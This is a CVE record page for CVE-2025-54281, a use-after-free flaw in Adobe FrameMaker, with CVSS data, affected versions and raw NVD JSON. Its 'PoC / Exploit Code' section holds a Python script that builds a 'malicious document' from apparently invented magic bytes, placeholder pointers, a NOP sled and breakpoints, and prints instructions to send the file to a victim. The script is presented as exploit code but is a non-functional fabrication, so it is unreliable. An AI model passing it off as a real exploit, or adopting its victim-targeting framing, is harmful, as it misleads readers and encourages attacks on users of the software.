Security Vulnerability Report
中文
CVE-2025-54281 CVSS 7.8 HIGH

CVE-2025-54281

Published: 2025-10-14 20:15:38
Last Modified: 2025-10-17 14:54:06

Description

Adobe Framemaker versions 2020.9, 2022.7 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Framemaker 2020.9
Adobe Framemaker 2022.7
Adobe Framemaker 2020.9及更早版本
Adobe Framemaker 2022.7及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54281 - Adobe Framemaker Use After Free Vulnerability PoC # This PoC demonstrates the concept of triggering a Use After Free vulnerability # in Adobe Framemaker through a malicious document file. # NOTE: This is a conceptual PoC for educational and research purposes only. import struct import sys # Malicious document header simulating Adobe Framemaker document format MALICIOUS_DOC_HEADER = b'\x46\x4D\x4B\x52' # "FMKR" magic bytes def create_malicious_document(output_path): """ Create a malicious document that triggers the Use After Free vulnerability in Adobe Framemaker versions 2020.9, 2022.7 and earlier. """ payload = b'' # Document header payload += MALICIOUS_DOC_HEADER # Crafted object reference to trigger UAF # The vulnerability occurs when a freed object is accessed again payload += struct.pack('<I', 0x41414141) # Freed object pointer reference payload += struct.pack('<I', 0x42424242) # Use-after-free trigger offset # Shellcode placeholder (would be replaced with actual payload in real exploit) payload += b'\x90' * 256 # NOP sled payload += b'\xCC' * 128 # INT3 breakpoints for debugging # Document footer payload += b'\x45\x4F\x46\x4D' # End of document marker with open(output_path, 'wb') as f: f.write(payload) print(f"[+] Malicious document created: {output_path}") print(f"[!] Send this file to a victim using Adobe Framemaker 2020.9/2022.7 or earlier") print(f"[!] When the victim opens the file, arbitrary code execution may occur") if __name__ == "__main__": output = sys.argv[1] if len(sys.argv) > 1 else "exploit.fm" create_malicious_document(output)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54281", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:38.163", "lastModified": "2025-10-17T14:54:06.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2020.9, 2022.7 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2020.10", "matchCriteriaId": "388F038A-4436-4CEC-9A7E-42C886265659"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionStartIncluding": "2022", "versionEndExcluding": "2022.8", "matchCriteriaId": "ADEEB295-8FA3-4719-BEFA-570A9D8A5394"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb25-101.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}